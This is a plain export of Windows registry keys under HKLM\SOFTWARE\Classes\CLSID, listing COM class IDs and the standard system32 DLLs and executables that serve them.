HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{01D0A625-782D-4777-8D4E-547E6457FAD5}\Elevation IconReference REG_EXPAND_SZ @%systemroot%\system32\werconcpl.dll,-6 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{01E04581-4EEE-11d0-BFE9-00AA005B4383}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{01F3E95C-7D8F-46e6-A408-9BA5D1FA5067}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{01FA60A0-BBFF-11D0-8825-00A0C903B83C}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\certenc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{021003e9-aac0-4975-979f-14b5d4e717f8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{021812bc-ae59-4f3c-9e04-72adc0ac9da5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0245858B-948D-4f36-A574-1A71EF5111CB}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\fvecpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{025A5937-A6BE-4686-A844-36FE4BEC8B6D} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\powercpl.dll,-2#immutable1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\powercpl.dll,-1#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{025A5937-A6BE-4686-A844-36FE4BEC8B6D}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\powercpl.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{025A5937-A6BE-4686-A844-36FE4BEC8B6D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shdocvw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{025A5937-A6BE-4686-A844-36FE4BEC8B6D}\Instance\InitPropertyBag ResourceDLL REG_EXPAND_SZ %SystemRoot%\System32\powercpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{02665D88-6A3E-4DFC-BEFF-8CA2118A5061}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingMonitor.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{02783ae2-02a6-4403-a482-e08bf20ffd06}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\CapabilityAccessHandlers.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{02805F1E-D5AA-415B-82C5-61C033A988A6}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0289a7c5-91bf-4547-81ae-fec91a89dec5}\LocalServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\WinrsHost.exe ServerExecutable REG_EXPAND_SZ %systemroot%\system32\WinrsHost.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{02A3586C-D264-40BF-97F7-FE40F7E3A882}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\vdsdyn.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{02df6db6-9405-4812-b3f6-500e8615b7af}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{02E6EC4C-96E4-42E8-B533-336916A0087D}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\lsmproxy.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{02E7E69E-E80A-48E3-8B1D-6448C25B1710}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{02E7E69E-E80A-48E3-8B1D-6448C25B1710}\Instance\PropertySetStorage Schema REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll,2 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03012959-F4F6-44D7-9D09-DAA087A9DB57}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecs.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\windows.storage.dll,-50691 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-1023 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{031E4825-7B94-4dc3-B131-E946B44C8DD5}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03372354-C040-4C4E-94D1-27DB5A879A33}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Win32CompatibilityAppraiserCSP.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0340F119-A598-4ed9-B0AC-6F6A12D3E755}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\propsys.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wininet.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0363215C-3B87-4C3D-8300-FF3FD3E02B91}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{037c3380-0855-4e8a-8c80-0aa3f697cd27}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\ttlsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837511-098B-11D8-9414-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\pla.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837511-098B-11D8-9414-505054503030}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\plasrv.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837513-098B-11D8-9414-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\pla.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837513-098B-11D8-9414-505054503030}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\plasrv.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0383751C-098B-11D8-9414-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\pla.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0383751C-098B-11D8-9414-505054503030}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\plasrv.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837521-098B-11D8-9414-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\pla.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837521-098B-11D8-9414-505054503030}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\plasrv.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837525-098B-11D8-9414-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\pla.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837525-098B-11D8-9414-505054503030}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\plasrv.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837526-098B-11D8-9414-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\pla.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837526-098B-11D8-9414-505054503030}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\plasrv.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837527-098B-11D8-9414-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\pla.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837527-098B-11D8-9414-505054503030}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\plasrv.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837528-098B-11D8-9414-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\pla.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837528-098B-11D8-9414-505054503030}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\plasrv.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837529-098B-11D8-9414-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\pla.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837529-098B-11D8-9414-505054503030}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\plasrv.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837530-098B-11D8-9414-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\pla.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837530-098B-11D8-9414-505054503030}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\plasrv.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837531-098B-11D8-9414-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\pla.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837531-098B-11D8-9414-505054503030}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\plasrv.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837532-098B-11D8-9414-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\pla.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837532-098B-11D8-9414-505054503030}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\plasrv.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837538-098B-11D8-9414-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\pla.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837538-098B-11D8-9414-505054503030}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\plasrv.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837539-098B-11D8-9414-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\pla.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837539-098B-11D8-9414-505054503030}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\plasrv.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837546-098B-11D8-9414-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\pla.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837546-098B-11D8-9414-505054503030}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\plasrv.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837547-098B-11D8-9414-505054503030}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\pla.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03837547-098B-11D8-9414-505054503030}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\plasrv.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03C036F1-A186-11D0-824A-00AA005B4383}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03e15b2e-cca6-451c-8fb0-1e2ee37a27dd} LocalizedString REG_EXPAND_SZ @%systemroot%\system32\tapiui.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03e15b2e-cca6-451c-8fb0-1e2ee37a27dd}\Elevation IconReference REG_EXPAND_SZ @%systemroot%\system32\tapiui.dll,-201 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03e15b2e-cca6-451c-8fb0-1e2ee37a27dd}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\tapilua.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03E7DAD7-17A6-4F91-A879-F276B6FD62F8}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\delegatorprovider.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0413965e-17f3-46b2-b39f-f8aced04194c}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSync.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{046AEAD9-5A27-4D3C-8A67-F82552E0A91B}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {046AEAD9-5A27-4D3C-8A67-F82552E0A91B} HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\Windows.Storage.Search.dll,-30523 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.Search.dll,-323 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04731B67-D933-450a-90E6-4ACD2E9408FE}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04788120-12C2-498D-83C1-A7D92E677AC6}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wmipcima.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{047DEC5A-95C1-4C86-827F-7B8C92EBA67A}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\winrssrv.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{047ea9a0-93bb-415f-a1c3-d7aeb3dd5087}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\fsquirt.exe,-107 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{047ea9a0-93bb-415f-a1c3-d7aeb3dd5087}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\fsquirt.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04A7F8A1-F465-4079-A4FD-B8F4700DF426}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{04AF2416-5F4C-4FEB-A9A8-BBF9893A4E6B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{05058F23-20BE-11d2-8F18-0000F87A4335}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Pimstore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0520af9e-e3da-4b32-8be8-0f3e475bfc5f}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\fdprint.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{05238C14-A6E1-11D0-9A84-00C04FD8DBF7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\els.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{055E80CA-DD63-4C25-93AB-448BBDB7AA17}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobedui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{056440FD-8568-48e7-A632-72157243B55B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\explorerframe.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wininet.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{05d7b0f4-2121-4eff-bf6b-ed3f69b894d7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\taskbarcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{05d7b0f4-2121-4eff-bf6b-ed3f69b894d8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\taskbarcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9} InfoTip REG_EXPAND_SZ @%SystemRoot%\System32\taskbarcpl.dll,-2#immutable1 LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\taskbarcpl.dll,-1#immutable1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\System32\taskbarcpl.dll,-1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\shdocvw.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9}\Instance\InitPropertyBag ResourceDLL REG_EXPAND_SZ %SystemRoot%\System32\taskbarcpl.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{05DF8D13-C355-47f4-A11E-851B338CEFB8}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\WinSATAPI.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{05F3561D-0358-4687-8ACD-A34D24C488DF}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\ActionCenterCPL.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{05FDB3A2-5639-4D24-AF7D-4C6FB0684661}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06334b1f-d73e-42f5-a448-5bd2df3c5ec7}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\eapsimextdesktop.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{063B79F5-7539-11D2-9773-00A0C9B4D50C}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\clbcatq.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{063B79F6-7539-11D2-9773-00A0C9B4D50C}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\clbcatq.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06405088-BC01-4E08-B392-5303E75090C8}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech_OneCore\Engines\SR\spsreng_onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0655E396-25D0-11D3-9C26-00C04F8EF87C}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\Speech\Common\sapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06587E71-F043-403A-BF49-CB591BA6E103}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AUDIOENG.DLL HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06622D85-6856-4460-8DE1-A81921B41C4B}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{067B4B81-B1EC-489f-B111-940EBDC44EBE}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\System32\cewmdm.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06946266-393A-456E-92BC-91DDDBF6893C}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06A03425-C9EB-11d2-8CAA-0080C739E3E0}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\mmcshext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06C792F8-6212-4F39-BF70-E8C0AC965C23} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\UserAccountControlSettings.dll,-70 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06C792F8-6212-4F39-BF70-E8C0AC965C23}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\UserAccountControlSettings.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06CCA63E-9941-441B-B004-39F999ADA412}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\mmdevapi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0700F42F-EEE3-443a-9899-166F16286796}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\provsvc.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{07252659-bb6b-4b79-b78b-623f6699a579}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\AUDIOENG.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0725C3CB-FEFB-11D0-99F9-00C04FC2F8EC}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\wbem\wmiprov.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{07398dcf-2e0b-4ece-99dd-56b262db948b}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.Storage.Search.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{076C2A6C-F78F-4C46-A723-3583E70876EA}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windowscodecsext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{078759d3-423b-48ad-ab6a-5638c2884dbe}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0794B86D-0158-4EC1-8D52-E4025DCE746A}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{079AA557-4A18-424A-8EEE-E39F0A8D41B9}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\msxml3.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{07D26616-6136-11D1-8C9C-00C04FC3261D}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\clbcatq.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{07FFDD7A-0300-4FDC-B113-1C5364E61F54}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\Windows.UI.Immersive.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{080d0d78-f421-11d0-a36e-00c04fb950dc}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\activeds.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0823B6F8-F499-4d5e-B885-EA9CB4F43B24}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.18362.350_none_5f2790f858f0e2a7\TiWorker.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{087798c4-3c0a-48d4-abc9-ed60912fa139}\InprocServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\VmApplicationHealthMonitorProxy.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{088e3905-0323-4b02-9826-5d99428e115f}\DefaultIcon (Default) REG_EXPAND_SZ %SystemRoot%\system32\imageres.dll,-184 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{088e3905-0323-4b02-9826-5d99428e115f}\InProcServer32 (Default) REG_EXPAND_SZ %systemroot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{088E8DFB-2464-4C21-BAD2-F0AA6DB5D4BC}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\hcproviders.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{08d450b7-f7e5-4424-8229-11888adb7c14} LocalizedString REG_EXPAND_SZ @%SystemRoot%\system32\fontext.dll,-200 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{08d450b7-f7e5-4424-8229-11888adb7c14}\Elevation IconReference REG_EXPAND_SZ @%SystemRoot%\system32\fontext.dll,-10 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{08d450b7-f7e5-4424-8229-11888adb7c14}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\fontext.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{08d5bfbf-fbca-4322-9f70-ca9f66f8ed6a}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{08DFCEF6-4F00-436F-B621-B1585343C2FB}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\oobe\msoobeplugins.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{08F91D9D-1F00-48C2-B90F-CC75FFAFE727}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\SettingSyncCore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{08FC06E4-C6B5-40BE-97B0-B80F943C615B}\LocalServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\ProximityUxHost.exe HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{09017262-fdb4-4ff2-9013-26332c926ee7}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{09156f15-2b3d-4864-a60e-82b82baa18da}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\twinui.pcshell.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{09474572-B2FB-11D1-A1A1-0000F875B132}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\cic.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0947c622-f98a-48a5-9df7-60e5fe202e07}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0968e258-16c7-4dba-aa86-462dd61e31a3} LocalizedString REG_EXPAND_SZ @%SystemRoot%\System32\urlmon.dll,-4200 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{09799AFB-AD67-11d1-ABCD-00C04FC30936}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0991CE67-3649-4138-85A8-E17D037298DB}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\enterprisecsps.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0997898B-0713-11d2-A4AA-00C04F8EEB3E}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\windows.storage.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{09a28848-0e97-4cef-b950-cea037161155}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\shell32.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{09A5DFC5-8BA2-47DD-BF84-FFD7E0B24481}\InProcServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\windows.cortana.onecore.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{09A81E78-E1D3-44D4-84E3-C33A04A4CC6E}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\System32\CIWmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{09F81337-D568-41d1-A177-D6779AF55847}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\tscfgwmi.dll HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0A14D3FF-EC53-450f-AA30-FFBC55BE26A2}\InprocServer32 (Default) REG_EXPAND_SZ %SystemRoot%\system32\sppcomapi.dll 